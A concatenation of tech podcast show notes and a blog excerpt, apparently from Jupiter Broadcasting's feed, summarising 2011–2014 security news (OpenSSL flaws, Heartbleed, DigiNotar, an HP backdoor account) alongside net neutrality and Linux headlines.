Yummy! This savoury mass of source code has been tagged in Github
(release 0.2.0)
and we have updated our live demos.

The Scourge Of Zero Rating – AVC

Fred Wilson is a New York City-based venture capitalist since 1986, and a blogger. Wilson is the co-founder of Union Square Ventures, with investments in companies such as Twitter, Tumblr, Foursquare, Zynga, Kickstarter, and others.

It seems like every week I read another article about a mobile carrier offering some incredible deal to eat the mobile data costs you rack up using certain apps.

The most recent was the news that Sprint will sell at data plan that “only connects to Facebook and Twitter”.

The pernicious thing about zero rating is that it is marketed as a consumer friendly offering by the mobile carrier — “we are not charging you for data when you are on Spotify”.

But what all of this zero rating activity is setting up is a mobile internet that looks a lot more like cable TV than our wide open Internet. Soon a startup will have to negotiate a zero rating plan before launching because mobile app customers will be trained to only use apps that are zero rated on their network.

I strongly encourage policy makers, policy wonks, internet activists, and anyone who cares about protecting an open internet for all to take a hard look at zero rating. Like all the best scourges, it’s a wolf in sheep’s clothing.

• Fred Wilson (fredwilson) on Twitter
• Fred Wilson (financier) – Wikipedia, the free encyclopedia

The post Big Brother Google | Tech Talk Today 37 first appeared on Jupiter Broadcasting.

Just when you thought openSSL was safe, we’ve got a whole new round of security flaws. Plus we’ll go inside a massive online carding shop.

Then it’s your questions, our answers, and much much more!

Thanks to:

— Show Notes: —

OpenSSL and GnuTLS flaws

• A series of new vulnerabilities have been found in both SSL/TLS libraries
• Latest Versions:
• OpenSSL 0.9.8za.
• OpenSSL 1.0.0m.
• OpenSSL 1.0.1h.
• CVE-2014-0224 — An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server. The attack can only be performed between a vulnerable client and server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.
• CVE-2014-0221 — By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack. Only applications using OpenSSL as a DTLS client are affected.
• CVE-2014-0195 — A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server. This is potentially exploitable to run arbitrary code on a vulnerable client or server. Only applications using OpenSSL as a DTLS client or server affected.
• CVE-2014-0198 — A flaw in the do_ssl3_write function can allow remote attackers to cause a denial of service via a NULL pointer dereference. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
• CVE-2010-5298 — A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
• CVE-2014-3470 — OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack.
• OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper \”Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack”. This issue was previously fixed in OpenSSL 1.0.1g.
• GnuTLS releases update to fix flaws as well
• CVE-2014-3466 — A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session id value and trigger a buffer overflow in a connecting TLS/SSL client using GnuTLS, causing it to crash or, possibly, execute arbitrary code. The flaw is in read_server_hello() / _gnutls_read_server_hello(), where session_id_len is checked to not exceed incoming packet size, but not checked to ensure it does not exceed maximum session id length
• Deeper analysis of the GnuTLS flaw

Inside a carding shop

• Bryan Krebs releases his expose on the inner workings of a professional carding shop
• This shop focused on ‘dumps’, full track data that can be written to blank cards, allowing the fraudster to take the card into a big box store, and buy large ticket items that can easily be sold for cash
• “The subject of this post is “McDumpals,” a leading dumps shop that first went online in late April 2013. “
• “Like many other dumps shops, McDumpals recently began requiring potential new customers to pay a deposit (~$100) via Bitcoin before being allowed to view the goods for sale. Also typical of most card shops, this store’s home page features the latest news about new batches of stolen cards that have just been added, as well as price reductions on older batches of cards that are less reliable as instruments of fraud.”
• Bryan has a great slideshow that shows some of the regions and retails that were compromised, and what the sets of cards sell for

Feedback:

• Forever Changing IP Address?

• Lan neutrality

• Can you give me an advice regarding zfs on my nas?!

• YouTube / Google Video and Net Neutrality

• Any Swedish Techsnap fans?

Round Up:

• Linux users at risk as ANOTHER critical GnuTLS bug found
• It\’s not Net Neutrality that\’s at stake, it\’s Cable Company Fuckery
• New Heartbleed attack hits Android devices and routers over Wi-Fi
• Malware creation breaks record 160,000 new samples per day
• Google Releases End-to-End Encryption Extension
• Insecure by design and trusted by default, the hell that is unpatchable embedded systems
• Linksys E4200 vulnerability allows attacker to bypass admin password
• New Soraya Malware includes Form Grabbing, Memory Scraping Functionality
• Heartbleed exploitable over enterprise wireless networks
• Vulnerabilities found in law enforcement surveillance systems
• Crucial launches new data center grade SSDs, but also new MX100 consumer line at under 50 cents per GiB

The post House of Credit Cards | TechSNAP 165 first appeared on Jupiter Broadcasting.

The tech headlines of the day, like Intel’s fully wireless PC, Sprint buying T-Mobile, and Reset the Net.

Then we’ll look at the convergence strategies of Apple, Microsoft, and Canonical and debate if Apple nailed the most practical implementation at this year’s WWDC.

Plus feedback, follow up, and more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a Tech Talk Today supporter on Patreon:

Show Notes:

Headlines

Reset the Net

First, get hundreds of sites & apps to add proven security (like
SSL).

Then on June 5, we\’ll run a splash screen everywhere to spread NSA-resistant
privacy tools.

Comcast plans to encrypt email exchanged with Google\’s Gmail | PCWorld

Comcast plans to work with Google to encrypt email exchanged between its own servers and Gmail, a Comcast spokesman said on Tuesday night.

Comcast supports Transport Layer Service encryption for email messages, and Comcast employees \”plan to ramp up with Gmail in next few weeks,\” a Comcast spokesman said via a Twitter message. More details will be revealed at the Messaging, Malware and Mobile Anti-Abuse Working Group meeting next week, he said, which will be held in Brussels. Comcast is a meeting sponsor.

UPDATE 3-Sprint agrees to pay about $40/shr to buy T-Mobile -source | Reuters

Sprint Corp has agreed to pay about $40 per share to buy T-Mobile US Inc, a person familiar with the matter told Reuters on Wednesday, signalling progress in a long-contemplated deal to merge the third- and fourth-largest U.S. wireless carriers.

At that price, about a 17 percent premium to the carrier\’s Wednesday close, T-Mobile would be worth more than $32 billion.

Deutsche Telekom owns 67 percent of T-Mobile and is expected to keep a 15 to 20 percent stake of the combined company as part of the deal, the source said on condition of anonymity because the discussions were private.

Intel aims to eliminate all PC cables in 2016 – CNET

On stage at the Computex, Intel\’s Kirk Skaugen, senior vice president and general manager of the PC Client Group, demonstrated wireless display, docking and charging features that will close the loop on the final few mandatory cables in the typical PC environment.

The high-speed WiGig standard will be used as the short range \”docking\” technology, instantly creating a connection to a screen and peripherals when a device is moved within range and then swapping back out to standalone usage by just picking up and walking away. WiGig delivers speeds of up to 7Gbps.

For power, Skaugen demonstrated Rezence, the magnetic resonance charging technology, promoted by the Alliance 4 Wireless Power (A4WP), that Intel is aligned with. The system can be installed under a table surface, with magnetic resonance capable of charging through 2 inches of wood.

With Skylake expected second half of 2015 it\’s likely devices based on Intel\’s reference designs would start to hit the market in 2016.

Microsoft: Software update unlocks more GPU bandwidth on Xbox One | Ars Technica

Microsoft says the new firmware will also help developers extract more power from the system\’s Graphical Processing Unit (GPU), even though the base hardware in the system is obviously staying the same.

\”In June we’re releasing a new SDK making it possible for developers to access additional GPU resources previously reserved for Kinect and system functions,\” a Microsoft spokesperson told Ars today. \”The additional resources allow access to up to 10 percent additional GPU performance. We\’re committed to giving developers new tools and flexibility to make their Xbox One games even better by giving them the option to use the GPU reserve in whatever way is best for them and their games.\”

Did Apple Nail Convergence?

• Apple Handoff lets Macs and iPhones share files, phone calls, and more

• A Closer Look at \’Handoff\’ and Other New iOS 8/Yosemite \’Continuity\’ Features

NSA-Mocking Easter Egg Found In Google’s New Email Encryption Plug-In

However, Google left a little easter egg in the code that is more than funny.

Feedback:

• Net neutrality explained better than anywhere else I\’ve found

• Who Should Pay for the Bandwidth?: Security Now 457

• skullplate aks… Why not music?

T3 lands in iTunes: iTunes – Podcasts – Tech Talk Today MP3

Unfilter Shirt: Unfilter Episode 100 Shirt! | Teespring

Hosts:

Guest:

• Twitter NAME

Chris:

• Twitter ChrisLAS
• Google+ +ChrisFisher

The post Getting a Handoff | Tech Talk Today 4 first appeared on Jupiter Broadcasting.

Netflix is naming and shaming ISPs right on the buffering screen of your movie and Verizon is not happy about it.

Plus Amazon is putting the hurt on book publishers, leveraging it’s growing monopoly and why despite our better judgment, we can’t help but live Prime.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed

Become a Tech Talk Today supporter on Patreon:

Show Notes:

Headlines

Valve shows off updated VR headset prototype with Dota 2 demo

Valve’s prototype unit looks a lot like Oculus’ recently demoed Crystal Cove test unit. It’s a black wrap-around device covered with white IR-reflective dots. A separate camera uses those dots to keep tabs on how the wearer is moving his or her head. This allows for much more accurate motion tracking and a better immersive experience than simply using accelerometers and gyroscopes in the device itself. The last prototype, which was demoed in a very limited fashion, used QR codes and a camera attached to the visor to improve tracking.

Safer email – Transparency Report – Google

Gmail has always supported encryption in transit by using Transport Layer Security (TLS), and will automatically encrypt your incoming and outgoing emails if it can. The important thing is that both sides of an email exchange need to support encryption for it to work; Gmail can\’t do it alone.

Our data show that approximately 40 to 50 percent of emails sent between Gmail and other email providers aren’t encrypted.

• Of course this is not talking about email storage, but email in transit.

• ProtonMail – Secure Email, Made Simple

ProtonMail was founded in summer 2013 at CERN by scientists who were drawn together by a shared vision of a more secure and private Internet. Early ProtonMail hackathons were held at the famous CERN Restaurant One. ProtonMail is developed both at CERN and MIT and is headquartered in Geneva, Switzerland

Intel Reaches 5GHz with New Core I7 Chip for Gamers

Intel is shipping a new Core i7 chip for gamers that runs at 4.4GHz — and can be overclocked to 5GHz.

The Core i7-4790K is a quad-core chip based on the Haswell microarchitecture. It draws 88 watts of power and has 8MB of cache, integrated graphics, memory controllers and support for the latest I/O technologies. It also supports multithreading and allow cores to process two tasks at one time.

Netflix Blames Verizon for Slow Streams

In April, Netflix signed a Web traffic deal with Verizon. Now it is telling some of its customers that Verizon\’s pipes — and, presumably, other ISP\’s as well — aren\’t up to snuff.

Amazon

Amazon/Hachette dispute unlikely to provoke regulators, experts say

Amazon has delayed the delivery of some Hachette Book Group titles and even removed an option to pre-order \”The Silkworm,\” by Harry Potter author J.K. Rowling writing as Robert Galbraith. Hachette, the fourth largest U.S. book publisher, is owned by France\’s Lagadere SCA.

• How the Amazon-Hachette Fight Could Shape the Future of Ideas – Jeremy Greenfield – The Atlantic

By some estimates, today Amazon controls around 50 percent of all book sales—physical and electronic—in the U.S. In the past decade, the company has steadily grown that market share, taking it from Barnes & Noble (shrinking), Borders (bankrupt since 2011), and independent bookstores (around 2,000 remain today out of the nearly 7,000 there were in the mid-1990s).

Amazon CEO wins World\’s Worst Boss

Amazon CEO Jeff Bezos is the world\’s worst boss, according to the International Trade Union Confederation (ITUC).

More than 20,000 voted for nine bosses who exemplified the worst behavior and abuses in workers\’ rights, tax avoidance, and corporate bullying and other abuses.

Bezos resoundingly won.

\”Jeff Bezos represents the inhumanity of employers who are promoting the American corporate model. The message to big business is back off, you are not going to mistreat workers,\” said Burrow.

Amazon Robotics Kiva Systems

Amazon currently uses some 1,000 robots by Kiva Systems, a company it bought for $775 million in 2012, to fill its customers\’ orders. Now CNN reports that Amazon will have 10,000 robots doing the same by the end of this year.

CEO Jeff Bezos revealed the plan to double down on robotics during a shareholder meeting and emphasized that despite the popular sci-fi theme of robotic uprising, no humans will lose their jobs as a result of the increased robotic workforce.

A Day in the Life of a Kiva Robot

Kiva Systems founder and CEO Mick Mountz narrates a play-by-play video of how Kiva robots automate a warehouse environment.

The Everything Store: Jeff Bezos and the Age of Amazon Audiobook

Amazon.com started off delivering books through the mail. But its visionary founder, Jeff Bezos, wasn\’t content with being a bookseller. He wanted Amazon to become the everything store, offering limitless selection and seductive convenience at disruptively low prices. To do so, he developed a corporate culture of relentless ambition and secrecy that\’s never been cracked. Until now.

Hosts:

Guest:

• Noah (kernellinux) on facebook
• Noah on Google+
• Noah (@kernellinux) on twitter

Chris:

• Twitter ChrisLAS
• Google+ +ChrisFisher

The post Netflix Bites the Bully | Tech Talk Today 3 first appeared on Jupiter Broadcasting.

OpenBSD launches LibreSSL, but what challenges do they face? And how much progress have they made? We’ll report!

Apple is struck with its own woes, Heartbleed is used to bypass two-factor authentication, and then its a great batch of your questions and our answers!

On this week’s episode of TechSNAP!

Thanks to:

— Show Notes: —

OpenBSD launches LibreSSL

• The team behind OpenBSD has formalized their fork of OpenSSL and called it LibreSSL
• The goal is to update the coding standards, to use more modern and safer C programming practises
• The impetus for this was infact not Heartbleed, but the mitigation countermeasures discovered by OpenBSD developers before Heartbleed was found
• The way much of OpenSSL is constructed makes it harder to audit with tools like Coverient and Valgrind, and the lack of consistent style, naming etc, makes it exceptionally hard to audit by hand
• There were many bugs in the OpenSSL bug tracker that had been open for as much as 4 years and never addressed
• Bob Beck of the OpenBSD project says that most of the actual crypto code in OpenSSL is very good, as it was written by cryptographers, but a lot of the plumbing is very old and needs serious updating
• Part of the 90,000 lines of code removed in LibreSSL was the FIPS compliance module, which has not been maintained for nearly 20 years
• So far, all of the changes have been API compatible, so any application that can use OpenSSL can still use LibreSSL
• The OpenBSD Foundation is soliciting donations to continue the work on LibreSSL and develop a portable version for other operating systems
• LibreSSL site, complete with working tag

Apple fixes major SSL flaw that could have allowed an attacker to intercept data over an encrypted connection, or inject their own data into the connection

• Apple has fixed a serious security flaw that’s present in many versions of both iOS and OSX and could allow an attacker to intercept data on SSL connections. The bug is one of many that the company fixed Tuesday
• In a ‘triple handshake’ attack, it was possible for an attacker to establish two connections which had the same encryption keys and handshake, insert the attacker’s data in one connection, and renegotiate so that the connections may be forwarded to each other,” the Apple
• The vulnerability affects OS X Mountain Lion 10.8.5, OS X Mavericks 10.9.2, as well as iOS 7.1 and earlier. The bug joins a list of serious problems that have affected SSL in recent months, most notably the OpenSSL heartbleed vulnerability disclosed earlier this month.
• OSX also contains two separate vulnerabilities that could enable an attacker to bypass ASLR, one of the key exploit mitigations built into the operating system. One of the flaws is in the IOKit kernel while the other is in the OSX kernel. The IOKit kernel ASLR bypass also affects iOS 7.1 users.
• Among the other flaws Apple patched in its new releases are a number other severe vulnerabilities. For OSX Mavericks users, the two most concerning issues are a pair of buffer overflows that could lead to remote code execution. One of the bugs is in the font parser and the second is in the imageIO component. The upshot of the vulnerabilities is that opening a malicious PDF or JPEG could lead to arbitrary code execution.

Heartbleed used to defeat 2 factor authentication

• Security nightmares sparked by the Heartbleed OpenSSL vulnerability continue. According to Mandiant, now a unit of FireEye
• An attacker was able to leverage the Heartbleed vulnerability against the VPN appliance of a customer and hijack multiple active user sessions.
• The attack bypassed both the organization\’s multifactor authentication and the VPN client software used to validate that systems connecting to the VPN were owned by the organization and running specific security software.
• \”Specifically, the attacker repeatedly sent malformed heartbeat requests to the HTTPS web server running on the VPN device, which was compiled with a vulnerable version of OpenSSL, to obtain active session tokens for currently authenticated users,\” Mandiant\’s Christopher Glyer explained.
• With an active session token, the attacker successfully hijacked multiple active user sessions and convinced the VPN concentrator that he/she was legitimately authenticated.
• After connecting to the VPN, the attacker attempted to move laterally and escalate his/her privileges within the victim organization, Mandiant said.
• Additional Coverage

Feedback:

• 2 Questions for Allan and Chris

• SSL Certificate rating questions

• How does Tarsnap\’s dedupe work?

• How to protect apache httpd against ddos?

• How to protect apache httpd from (D)DoS attacks?

• Using Varnish to block DDoS or DoS

Round Up:

• North America is down to its last IPv4 address block
• Heartbleed used to steal SSL private key from Swedish VPN provider mullvad
• ICS-CERT issues advisory about heartbleed vulnerabilities in siemens SCADA/ICS gear
• Healthcare.gov preventatively resets all passwords
• F.B.I. Informant Is Tied to Cyberattacks Abroad
• Heartbleed highlights contradicition of the web
• Intel\’s next-gen Thunderbolt rumored to hit 40Gbps transfer speeds with new connector
• The value of, and problems with, CRLs and OCSP
• Google is working on end-to-end encryption for Gmail
• Java fixes critical SSL flaws

The post Heartbleed Fallout | TechSNAP 160 first appeared on Jupiter Broadcasting.

Opera’s code signing certificate gets compromised, resulting in malware getting push out via their automatic update system.

Plus the backdoor that ships in some high-end HP products, your questions, and much much more.

On this week’s TechSNAP!

Thanks to:

GoDaddy.com Use our code tech249 to score .COM for $2.49! 35% off your ENTIRE first order just use our code 35off3 until the end of the month!

Opera code signing certificate compromised

• On June 19th Opera uncovered, halted and contained a targeted attack on their internal network infrastructure.
• There is no evidence of any user data being compromised.
• The attackers were able to obtain at least one old and expired Opera code signing certificate, which they have used to sign some malware.
• This has allowed them to distribute malicious software which incorrectly appears to have been published by Opera Software, or appears to be the Opera browser.
• It is possible that a few thousand Windows users, who were using Opera between 01.00 and 01.36 UTC on June 19th, may automatically have received and installed the malicious software.

How much is your gmail account worth?

• University of Illinois at Chicago has developed ‘CloudSweeper’
• Connects to your gmail account via oauth and scans all of your email
• Finds which accounts you have connected to your gmail
• If an attacker were to compromise your gmail account, they could reset the passwords for and gain control over all of these accounts
• The service uses an index of the value of these accounts from various underground forums
• Tells you how much your gmail account would be worth to an attacker
• Finds services such as: Amazon, Apple, Groupon, Hulu, Newegg, Paypal, Skype, UPlay and Yahoo
• Optionally, it can also scan your email for plain text passwords in emails
• If found, CloudSweeper can connect to gmail via imap and edit these emails, either removing the password entirely (redacting), or encrypting it (replacing it with an encrypted string), Then provides you with a decryption key (a long string of text, or a QRcode for simplicity)
• If you ever need to decrypt the password, you return to CloudSweeper and scan the QRCode
• Krebs on Naming and Shaming Plain Text Passwords
• PlainTextOffenders.com
• PasswordFail.com – Browser extension to warn you before you sign up

$80,000 HP Backup device contains undocumented support user with fixed password

• HP announced that their D2D/StoreOnce deduplication backup products contained a flaw
• It seems there is an undocumented support user, named ‘HPSupport’, with a fixed 7 character password
• That means that if a person were to brute force that password, they would have SSH access to every StoreOnce device deployed around the world
• It just so happens, that is what someone has done, and they have even been helpful enough to provide the SHA1 hash of the password, so with a little effort, everyone else can brute force the password too
• HP will release a patch to disable this account on July 7th
• “In the interim, customers who wish to disable the backdoor can contact HP support for assistance on this,” the advisory noted. “HP support personnel will provide the assistance to manually disable the HPSupport user account.”
• Full Disclosure researcher

• HP Said: “HP identified a potential security issue with older HP StoreOnce models. This does not impact StoreOnce systems with the current version 3.0 software, including the HP StoreOnce B6200 and HP StoreOnce VSA product offerings. HP takes security issues very seriously and is working actively on a fix.”

• In December 2010, a similar problem was exposed with some HP NAS devices

Feedback

• Project Morris from the chat room (a frequent contributor) writes in: I was just wondering if you could make this evenings show extra BIG as today is my birthday.

• How long will data last on a hard drive that is rarely powered up

• Captive Portal Solution?

• Web browser security in WIndows. Question about my set-up.

• TOR in a VM

• Allan, why not run a home email server? : techsnap

• New NAS Best Practices?

• I was wondering if there was any sort of SSL that provided verification in a way that can be cached by any proxy (example squid)

• FreeNAS 9.1-BETA released, based on FreeBSD 9-STABLE. Latest and greatest ZFS features including LZ4 compression (better compression with less cpu time), ZFS TRIM Support, Improvements to disk encryption and overhaulted plugin jails (with a fancy GUI editor for PCBSD)

• Co-Founder of FreeBSD, Jordan Hubbard, leaves Apple after 12 years to return to working with FreeBSD full time at iXsystems – Focus on FreeNAS/TrueNAS and new products – Happy 20th Anniversary FreeBSD

Round Up:

• Use of Tor and e-mail crypto could increase chances that NSA keeps your data
• Political groups not the only ones targetted for IRS attention, Open Source Foundations were targetted as well
• Design student tries to push ‘NSA Proof’ Crypto-font, that isn’t crypto
• EU creates new rules for ISPs and Telcos, must report to national data protection authorities within 24 hours the full nature and size of the breach, where this is not possible an initial report must be made with full details to follow within 72 hours
• Facebook accidently exposes over 6 million users’ phone numbers and email addresses over the last year (details of friends were added to your address book, even if the privacy settings were not supposed to allow you access to that information)
• Java 6 EOL (no more updates unless you pay for support from Oracle)
• Fixing your NAS by using Open Source

The post HP’s Backdoor | TechSNAP 116 first appeared on Jupiter Broadcasting.

Games are rushing to Linux, and we cover some of the most original. Plus we dig into the mysterious new backer of the Kubuntu Project.

THEN: A Gmail power tip for Linux users, and so much more!

All this week on, The Linux Action Show!

Thanks to:

GoDaddy.com

Limited time offer: $5.99 .coms, up to 5 domains! just use our code 599com8

Want to save money on your entire order? Use our code spring8 and save 15%!

Direct Download:

HD Video | Large Video | Mobile Video | Ogg Video | MP3 Audio | Ogg Audio | YouTube

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds

Support the Show:

Purchase anything at Amazon.com Purchase anything at Think Geek using this link Purchase anything at Newegg using this link Contribute directly on our donation page or check out our advertising options and reach millions of amazing people! Grab our Chrome Extension and auto-tag your shopping session for us!

Runs Linux:

• This hand dryer… runs linux

Android Pick:

• BaconReader for Reddit
• Android Picks so far thanks to Madjo in the IRC Chat room!

Universal Pick:

• Synergy
• Picks so far. Thanks to Madjo!

Random Distro Of The Day

• Semplice

Linux Action Show Subreddit

• Linux Action Show Subreddit

NEWS:

• Turtle Arena
  • The Oddest Non-FPS Title Powered By ioquake3
• Kubuntu Finds New Sponsor
  • Blue-Systems.com
  • Kubuntu Partnership Netrunner
• Caligra 2.4 released
• First Raspberry Pi units delivered to school kids
• A New Window Manager for Chrome OS
• State of Wayland with video showing GTK apps running
• Open-Source NVIDIA Driver Approaches Stable State
• Remote Pre-Authentication Flaw Fixed in Samba
• Critical Flaw Found In WICD Component in Some Versions of Linux
• About the Liberated Pixel Cup
• Shadowrun Returns coming to Linux by way of Kickstarter
• First MMOLDBSG “Massively Multiplayer Online Linux Distro Building Simulation Game” announced
• Linux Tycoon coming to Android

Matt’s Howto:

For anyone using Ubuntu 11.10 or earlier, you may have found that installing the software desktop-webmail installs okay, but it’s not available to be selected under the preferred application settings. Most likely, you’re looking at Thunderbird only! This segment shows you how to side-step this issue, plus you’ll be able to use this Ubuntu PPA to completely prevent this problem from becoming a show-stopper for you.

Simply do the following in a terminal window:

sudo add-apt-repository ppa:asac/sandbox

sudo apt-get update
sudo apt-get install desktop-webmail

After closing and reopening your browser, try a “mailto” link and watch it open up Gmail (or whatever you have set up under desktop-webmail)

What’s Bryan Doin?

• Linux Tycoon
• Linux Fest Northwest
• Illumination Software Creator now permanently “Pay What You Want”

Chris’ Stash:

• New Show: Unfilter

Find us on Google+

• Chris
• Bryan
• Jupiter Broadcasting’s Page

Find us on Twitter:

• Chris – ChrisLAS
• Bryan – BryanLunduke

Follow the network on Facebook:

• Jupiter Broadcasting on Facebook

Jupiter Broadcasting Forum:

• Jupiter Colony

Catch the show LIVE Sunday 10am Pacific / 5pm UTC:

• https://jblive.tv
• Network Calendar

The post Mysterious Blue Systems | LAS | s21e05 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/11691/smarter-google-dns-techsnap-21/ Thu, 01 Sep 2011 22:42:23 +0000 https://original.jupiterbroadcasting.net/?p=11691 Google and openDNS join forces to improve the speed of your downloads, find out what they are doing and how it works!

The post Smarter Google DNS | TechSNAP 21 first appeared on Jupiter Broadcasting.

]]>

Google and openDNS join forces to improve the speed of your downloads, find out what they are doing and how it works!

Plus gmail suffered another man in the middle attack, and Kernel.org gets some egg on their face!

All that and more, on this week’s episode of TechSNAP!

Direct Download Links:

HD Video | Large Video | Mobile Video | WebM Video | MP3 Audio | OGG Audio | YouTube

Subscribe via RSS and iTunes:
Subscribe... --RSS-- TechSNAP HD TechSNAP Large TechSNAP Mobile TechSNAP MP3 TechSNAP OGG --iTunes-- TechSNAP iTunes HD TechSNAP iTunes Mobile TechSNAP iTunes Large TechSNAP iTunes MP3

[ad#shownotes]

Show Notes:

Another SSL Certificate Authority Compromised, MitM Attack on Gmail

• Sometime before July 10th, the Dutch Certificate Authority DigiNotar was compromised and the attackers we able to issue a number (apparently as many as 200) of fraudulent certificates, including a wildcard certificate for *.google.com. The attack was only detected by DigiNotar on July 19th. DigiNotar revoked the certificates, and an external security audit determined that all invalid certificates had been revoked. However, it seemed that probably the most important certificate, *.google.com was in fact not revoked. This raises serious questions and seems to point to a coverup by DigiNotar. Detailed Article Additional Article
• Newer versions of Chrome were not effected, because Google specifically listed a small subset of CAs who would ever be allowed to issue a certificate for gmail. This also prevents self-signed certificates, which some users fall for regardless of the giant scary browser warning. Chrome Security Notes for June
• Mozilla and the other browsers have taken more direct action disabled than they did with the Comodo compromise. All major browsers have entirely removed the the DigiNotar root certificate from their trust list. With the Comodo compromise, the effected certificates were blacklisted, but the rest of the Comodo CA was left untouched. One wonders if this was done as strong signal to all CAs that that must take security more seriously, or if DigiNotar was in fact cooperating with the Iranian government in its efforts to launch MitM attacks on its citizens. Mozilla Security Blog
• Part of the issue is that some of the certificates issued were for the browser manufacturers them selves, such as Mozilla.org. With a fake certificate from Mozilla, it is possible that the MitM attack could block updates to your browser, or worse, feed you a spyware laden version of the browser.
• Press Release from Parent Company VASCO
• Pastebin of the fraudulent Certificate

• Allan’s blog post about the previous CA compromise, and more detail than can fit even in an episode of TechSNAP
  *

  GoogleDNS and OpenDNS launch ‘A Faster Internet’

• The site promoted a DNS protocol extension called edns-client-subnet that would have the recursive DNS server pass along the IP Subnet (not the full IP, for privacy) of the requesting client, to allow the authoritative DNS server to make a better Geo Targetting Decision.
• A number of large content distributors and CDNs rely on GeoIP technology at DNS time to direct users to the nearest (and as such, usually fastest) server. However this approach is often defeated when a large portion of users are using GoogleDNS and OpenDNS and all of those requests come from a specific IP range. As this technology takes hold, it should make it possible for the Authoritative DNS servers to target the user rather than the Recursive DNS Server, resulting in more accurate results.
• Internet Engineering Task Force Draft Specification
• This change has already started effecting users, many users of services such as iTunes had complained of much slower download speeds when using Google or Open DNS. This was a result of being sent to a far-away node, and that node getting a disproportionate amount of the total load. Now that this DNS extension has started to come online and is backed by a number of major CDNs, it should alleviate the problem.

• ScaleEngine is in the process of implementing this, and already has some test edns enabled authoritative name servers online.
  *

  Kernel.org Compromised

• Attackers were able to compromise a number of Kernel.org machines
• Attackers appear to have compromised a single user account, and then through unknown means, gained root access.
• Attackers replaced the running OpenSSH server with a trojaned version, likely leaking the credentials of users who authenticated against it.
• Kernel.org is working with the 448 people who have accounts there, to replace their passwords and SSH keys.
• The attack was only discovered due to an extraneous error message about /dev/mem
• Additional Article

---

Feedback:

Q: (DreamsVoid) I have a server setup, and I am wondering what it would take to setup a backup server, that would automatically take over if the first server were to go down. What are some of the ways I could accomplish this?

A: This is a rather lengthy answer, so I will actually break it apart, and have given one possible answer each week, for the last few weeks. This weeks solution is Anycast. This is by far the most complicated and resource intensive solution, but it is also the most scalable. Standard connections on the Internet are Unicast, meaning they go from a single point to another single point (typically, from a client to a specific server). The are also Broadcast (send to all nodes in the broadcast domain, such as your local LAN), and Multicast (send to a group of subscribed peers, used extensively by routers to distribute routing table updates, but does not work on the Internet). Anycast is different than a Unicast, instead of sending the packet to a specific host, the packet is sent to the nearest host (in network terms, hops, not necessarily geographic terms). The way Anycast works is your BGP enabled routers broadcast a route to your subnet to the Internet from each of the different locations, and the other routers on the Internet update their routing tables with the route to the location that is the fewest hops away. In this way, your traffic is diverted to the nearest location. If one of your locations goes down, when the other routers do not get an update from the downed router, they automatically change their route to the next nearest location. If you want only fail over, and not to distribute traffic geographically, you can have your routers prefix their routes with their own AS number a sufficient number of times to make the backup location always more hops than the main location, so it is only used if the main is down. There are some caveats with this solution, the first being that TCP packets were never meant to randomly redirect to another location, if a route change happens in the middle of an active session, that session will not exist at the second location, and the connection will be dropped. This makes Anycast unsuitable for long-lived connections, as routes on the Internet change constantly, routing around faults and congestion. Connections also cannot be made outbound from an Anycast IP, as the route back may end up going to a different server, and so a response will never be received, so servers would require a regular Unicast address, plus the Anycast address. A common solution to overcome the limitations of Anycast, is to do DNS (which is primarily UDP) via Anycast, and have each location serve a different version of the authoritative zone, which the local IP address of the web server, this way the users are routed to the nearest DNS server, which then returns the regular IP of the web server at the same location (this solution suffers from the same problems mentioned above in the Google DNS story). Another limitation is that due to the size of the address space on the Internet, most provides will not accept a route for a subnet smaller than a /24, meaning than an entire 256 ip address subnet must be dedicated to Anycast, and your servers will each require a regular address in a normal subnet. Broadcasting routes to the Internet also requires your own Autonomous System number, which are only granted to largish providers, or an ISP willing to announce your subnet on their AS number, but this requires a Letter of Authorization from the owner of the IP block.
*

ROUND-UP:

• Chinese Government removes Cyber warfare videos and denies everything
• New XBox 360 hack allows unsigned code execution
• Anonymous takes credit for Denial of Service attack on Wikileaks
• Anonymous tested its attack tool against pastebin.com first
• New windows worm spreading via weak RDP Credentials
• Cyber crime gang steals $13 million in a day
  Thanks to: stmiller
• Pakistan official bans all encryption and forces ISPs to block encrypted VPN traffic
• Wikileak cables reveal U.S. Government lobbied on behalf of Oracle.
  Thanks to: silvernode and for the eye catching title!

Bitcoin-Blaster:

• Difficulty dropped down to 1777774.482!
• The relationship between bitcoin price and difficulty
• Has Bruce Wagner pulled off the biggest financial scam on the bitcoin community?
• Bitcoin Watch: $59,420,956 USD

The post Smarter Google DNS | TechSNAP 21 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/9026/hijacking-the-news-techsnap-8/ Thu, 02 Jun 2011 21:32:26 +0000 https://original.jupiterbroadcasting.net/?p=9026 Find out about the hack that leaked the "truth" about Tupac, and the details of 100s of GMail accounts that have been snooped on!

